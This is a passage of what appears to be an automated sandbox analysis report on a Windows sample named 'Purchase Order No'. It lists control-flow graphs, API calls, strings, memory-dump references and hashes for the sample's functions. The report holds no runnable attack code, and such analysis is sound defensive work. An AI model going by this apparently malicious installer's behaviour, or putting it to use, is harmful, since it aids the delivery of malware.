                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                      • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$user32::EnumWindows(i r1 ,i 0)
                                                                      • API String ID: 4024019347-3319343437
                                                                      • Opcode ID: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                                      • Instruction ID: 4a93dbd931fcfc477af1f24740db1e2af50c51fdf4929e220b088375b48f32a9
                                                                      • Opcode Fuzzy Hash: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                                      • Instruction Fuzzy Hash: 586147B26053005BEB206F25DD80B6B77E8AB54318F26453FF587B22D0DB3C8961875E

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 421 401774-401799 call 402dab call 405fc8 426 4017a3-4017b5 call 406682 call 405f51 lstrcatW 421->426 427 40179b-4017a1 call 406682 421->427 433 4017ba-4017bb call 406930 426->433 427->433 436 4017c0-4017c4 433->436 437 4017c6-4017d0 call 4069df 436->437 438 4017f7-4017fa 436->438 445 4017e2-4017f4 437->445 446 4017d2-4017e0 CompareFileTime 437->446 440 401802-40181e call 406172 438->440 441 4017fc-4017fd call 40614d 438->441 448 401820-401823 440->448 449 401892-4018bb call 405707 call 403376 440->449 441->440 445->438 446->445 450 401874-40187e call 405707 448->450 451 401825-401863 call 406682 * 2 call 4066bf call 406682 call 405ce2 448->451 463 4018c3-4018cf SetFileTime 449->463 464 4018bd-4018c1 449->464 461 401887-40188d 450->461 451->436 485 401869-40186a 451->485 465 402c38 461->465 467 4018d5-4018e0 CloseHandle 463->467 464->463 464->467 468 402c3a-402c3e 465->468 470 4018e6-4018e9 467->470 471 402c2f-402c32 467->471 473 4018eb-4018fc call 4066bf lstrcatW 470->473 474 4018fe-401901 call 4066bf 470->474 471->465 478 401906-40239d 473->478 474->478 483 4023a2-4023a7 478->483 484 40239d call 405ce2 478->484 483->468 484->483 485->461 486 40186c-40186d 485->486 486->450
                                                                      APIs
                                                                      • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\eftermodnendes\ringeagt\Bruttotrkkortet120,?,?,00000031), ref: 004017B5
                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\eftermodnendes\ringeagt\Bruttotrkkortet120,?,?,00000031), ref: 004017DA
                                                                        • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                        • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                        • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp$C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp\System.dll$C:\Users\user\eftermodnendes\ringeagt\Bruttotrkkortet120$Call
                                                                      • API String ID: 1941528284-3503673656
                                                                      • Opcode ID: 92a9eda8d8825c9069b007790ea2e2b4818238bc92c10959f2c45e0ca5d33b48
                                                                      • Instruction ID: 8b6fd23670850fd9ae356807d0398338211ecbfbdba6d544e24b7f39de498ea1
                                                                      • Opcode Fuzzy Hash: 92a9eda8d8825c9069b007790ea2e2b4818238bc92c10959f2c45e0ca5d33b48
                                                                      • Instruction Fuzzy Hash: 7541A331900109FACF11BBB5CD85DAE7A79EF41329B21423FF422B10E1D73D8A91966D

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 487 4026f1-40270a call 402d89 490 402710-402717 487->490 491 402c2f-402c32 487->491 492 402719 490->492 493 40271c-40271f 490->493 494 402c38-402c3e 491->494 492->493 496 402883-40288b 493->496 497 402725-402734 call 4065e2 493->497 496->491 497->496 500 40273a 497->500 501 402740-402744 500->501 502 4027d9-4027dc 501->502 503 40274a-402765 ReadFile 501->503 504 4027f4-402804 call 4061f5 502->504 505 4027de-4027e1 502->505 503->496 506 40276b-402770 503->506 504->496 516 402806 504->516 505->504 507 4027e3-4027ee call 406253 505->507 506->496 509 402776-402784 506->509 507->496 507->504 512 40278a-40279c MultiByteToWideChar 509->512 513 40283f-40284b call 4065c9 509->513 512->516 517 40279e-4027a1 512->517 513->494 519 402809-40280c 516->519 520 4027a3-4027ae 517->520 519->513 522 40280e-402813 519->522 520->519 521 4027b0-4027d5 SetFilePointer MultiByteToWideChar 520->521 521->520 523 4027d7 521->523 524 402850-402854 522->524 525 402815-40281a 522->525 523->516 526 402871-40287d SetFilePointer 524->526 527 402856-40285a 524->527 525->524 528 40281c-40282f 525->528 526->496 529 402862-40286f 527->529 530 40285c-402860 527->530 528->496 531 402831-402837 528->531 529->496 530->526 530->529 531->501 532 40283d 531->532 532->496
                                                                      APIs
                                                                      • ReadFile.KERNELBASE(?,?,?,?), ref: 0040275D
                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                                        • Part of subcall function 00406253: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406269
                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                      • String ID: 9
                                                                      • API String ID: 163830602-2366072709
                                                                      • Opcode ID: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
                                                                      • Instruction ID: 4accc3969fe2a7d0a9ccf1f8c11f2542f9fe60139f427c4dffc821b6e73cd172
                                                                      • Opcode Fuzzy Hash: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
                                                                      • Instruction Fuzzy Hash: F3510B75D0011AABDF24AF94CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 533 406a06-406a26 GetSystemDirectoryW 534 406a28 533->534 535 406a2a-406a2c 533->535 534->535 536 406a3d-406a3f 535->536 537 406a2e-406a37 535->537 539 406a40-406a73 wsprintfW LoadLibraryExW 536->539 537->536 538 406a39-406a3b 537->538 538->539
                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
                                                                      • wsprintfW.USER32 ref: 00406A58
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A6C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                      • String ID: %s%S.dll$UXTHEME
                                                                      • API String ID: 2200240437-1106614640
                                                                      • Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                                      • Instruction ID: 2238e0f1a46f5e25e3951852f43a11dddaa5b7c7f32292af2b6637a080077407
                                                                      • Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                                      • Instruction Fuzzy Hash: DFF0FC30601119A7CB14BB68DD0EFAB375C9B01704F10847AA646F10D0EB789664CF98

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 540 402eae-402ed7 call 4064ef 542 402edc-402ee0 540->542 543 402f91-402f95 542->543 544 402ee6-402eea 542->544 545 402eec-402f0d RegEnumValueW 544->545 546 402f0f-402f22 544->546 545->546 547 402f76-402f84 RegCloseKey 545->547 548 402f4b-402f52 RegEnumKeyW 546->548 547->543 549 402f24-402f26 548->549 550 402f54-402f66 RegCloseKey call 406a76 548->550 549->547 551 402f28-402f3c call 402eae 549->551 555 402f86-402f8c 550->555 556 402f68-402f74 RegDeleteKeyW 550->556 551->550 558 402f3e-402f4a 551->558 555->543 556->543 558->548
                                                                      APIs
                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: CloseEnum$DeleteValue
                                                                      • String ID:
                                                                      • API String ID: 1354259210-0
                                                                      • Opcode ID: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                                      • Instruction ID: 09cb529ade84319239dc5b50ebc61ba38ec7146c59f77be9acf979a475766563
                                                                      • Opcode Fuzzy Hash: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                                      • Instruction Fuzzy Hash: FD218B7150011ABFDF119F90CE89EEF7B7DEB10388F100076B949B11E0D7B48E54AA68

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 559 6fbb1817-6fbb1856 call 6fbb1bff 563 6fbb185c-6fbb1860 559->563 564 6fbb1976-6fbb1978 559->564 565 6fbb1869-6fbb1876 call 6fbb2480 563->565 566 6fbb1862-6fbb1868 call 6fbb243e 563->566 571 6fbb1878-6fbb187d 565->571 572 6fbb18a6-6fbb18ad 565->572 566->565 575 6fbb1898-6fbb189b 571->575 576 6fbb187f-6fbb1880 571->576 573 6fbb18af-6fbb18cb call 6fbb2655 call 6fbb1654 call 6fbb1312 GlobalFree 572->573 574 6fbb18cd-6fbb18d1 572->574 599 6fbb1925-6fbb1929 573->599 581 6fbb191e-6fbb1924 call 6fbb2655 574->581 582 6fbb18d3-6fbb191c call 6fbb1666 call 6fbb2655 574->582 575->572 577 6fbb189d-6fbb189e call 6fbb2e23 575->577 579 6fbb1888-6fbb1889 call 6fbb2b98 576->579 580 6fbb1882-6fbb1883 576->580 591 6fbb18a3 577->591 594 6fbb188e 579->594 587 6fbb1890-6fbb1896 call 6fbb2810 580->587 588 6fbb1885-6fbb1886 580->588 581->599 582->599 598 6fbb18a5 587->598 588->572 588->579 591->598 594->591 598->572 602 6fbb192b-6fbb1939 call 6fbb2618 599->602 603 6fbb1966-6fbb196d 599->603 609 6fbb193b-6fbb193e 602->609 610 6fbb1951-6fbb1958 602->610 603->564 605 6fbb196f-6fbb1970 GlobalFree 603->605 605->564 609->610 611 6fbb1940-6fbb1948 609->611 610->603 612 6fbb195a-6fbb1965 call 6fbb15dd 610->612 611->610 614 6fbb194a-6fbb194b FreeLibrary 611->614 612->603 614->610
                                                                      APIs
                                                                        • Part of subcall function 6FBB1BFF: GlobalFree.KERNEL32(?), ref: 6FBB1E74
                                                                        • Part of subcall function 6FBB1BFF: GlobalFree.KERNEL32(?), ref: 6FBB1E79
                                                                        • Part of subcall function 6FBB1BFF: GlobalFree.KERNEL32(?), ref: 6FBB1E7E
                                                                      • GlobalFree.KERNEL32(00000000), ref: 6FBB18C5
                                                                      • FreeLibrary.KERNEL32(?), ref: 6FBB194B
                                                                      • GlobalFree.KERNEL32(00000000), ref: 6FBB1970
                                                                        • Part of subcall function 6FBB243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6FBB246F
                                                                        • Part of subcall function 6FBB2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6FBB1896,00000000), ref: 6FBB28E0
                                                                        • Part of subcall function 6FBB1666: wsprintfW.USER32 ref: 6FBB1694
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3149615985.000000006FBB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FBB0000, based on PE: true
                                                                      • Associated: 00000000.00000002.3149545939.000000006FBB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3149634287.000000006FBB4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3149686738.000000006FBB6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6fbb0000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc$Librarywsprintf
                                                                      • String ID:
                                                                      • API String ID: 3962662361-3916222277
                                                                      • Opcode ID: cf06dbd493b804fea6cbd6ad4508bded2da921c7a6531ed7d4958e061ddc0e68
                                                                      • Instruction ID: fd845033df03062438e205ec1cdfe4f10b8be8f0a5e0e559185e94474ca70674
                                                                      • Opcode Fuzzy Hash: cf06dbd493b804fea6cbd6ad4508bded2da921c7a6531ed7d4958e061ddc0e68
                                                                      • Instruction Fuzzy Hash: 83418D718003C69ADB119F24FC88BE937A8FF06358F08456EE9559A0CADF74E186C6A0

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 616 401c48-401c68 call 402d89 * 2 621 401c74-401c78 616->621 622 401c6a-401c71 call 402dab 616->622 624 401c84-401c8a 621->624 625 401c7a-401c81 call 402dab 621->625 622->621 628 401cd8-401d02 call 402dab * 2 FindWindowExW 624->628 629 401c8c-401ca8 call 402d89 * 2 624->629 625->624 641 401d08 628->641 639 401cc8-401cd6 SendMessageW 629->639 640 401caa-401cc6 SendMessageTimeoutW 629->640 639->641 642 401d0b-401d0e 640->642 641->642 643 401d14 642->643 644 402c2f-402c3e 642->644 643->644
                                                                      APIs
                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Timeout
                                                                      • String ID: !
                                                                      • API String ID: 1777923405-2657877971
                                                                      • Opcode ID: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
                                                                      • Instruction ID: 6f1bda49a4997cd21eb3df4025a59d3ac8dc5d95b16fa6faa4f7de2005ea5abe
                                                                      • Opcode Fuzzy Hash: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
                                                                      • Instruction Fuzzy Hash: 57219C7191421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 647 4020dd-4020e9 648 4021a8-4021aa 647->648 649 4020ef-402105 call 402dab * 2 647->649 651 4022f6-4022fb call 401423 648->651 658 402115-402124 LoadLibraryExW 649->658 659 402107-402113 GetModuleHandleW 649->659 656 402c2f-402c3e 651->656 662 402126-402135 call 406ae5 658->662 663 4021a1-4021a3 658->663 659->658 659->662 666 402170-402175 call 405707 662->666 667 402137-40213d 662->667 663->651 671 40217a-40217d 666->671 669 402156-402169 call 6fbb1817 667->669 670 40213f-40214b call 401423 667->670 673 40216b-40216e 669->673 670->671 679 40214d-402154 670->679 671->656 674 402183-40218d call 403cf4 671->674 673->671 674->656 680 402193-40219c FreeLibrary 674->680 679->671 680->656
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402108
                                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                                        • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                        • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                        • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                        • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402119
                                                                      • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                      • String ID: 8[
                                                                      • API String ID: 334405425-3133125776
                                                                      • Opcode ID: cd3871a4674ab2d20781c98e55c83c75f0414bc3aa5ab025748cc012411ec63e
                                                                      • Instruction ID: d5d67dfdf4745362115819af7549d82072a8f7f049e0964222285d8f4f4a232d
                                                                      • Opcode Fuzzy Hash: cd3871a4674ab2d20781c98e55c83c75f0414bc3aa5ab025748cc012411ec63e
                                                                      • Instruction Fuzzy Hash: ED215031904108EADF11AFA5CE49A9E7A71FF44359F20413BF201B91E1CBBD8982AA5D

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 682 40248f-4024b6 call 402dab * 2 call 402e3b 688 4024bb-4024c0 682->688 689 4024c6-4024d0 688->689 690 402c2f-402c3e 688->690 691 4024d2-4024df call 402dab lstrlenW 689->691 692 4024e3-4024e6 689->692 691->692 696 4024e8-4024f9 call 402d89 692->696 697 4024fa-4024fd 692->697 696->697 698 40250e-402522 RegSetValueExW 697->698 699 4024ff-402509 call 403376 697->699 704 402524 698->704 705 402527-402608 RegCloseKey 698->705 699->698 704->705 705->690
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,00000023,00000011,00000002), ref: 004024DA
                                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,00000000,00000011,00000002), ref: 0040251A
                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,00000000,00000011,00000002), ref: 00402602
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
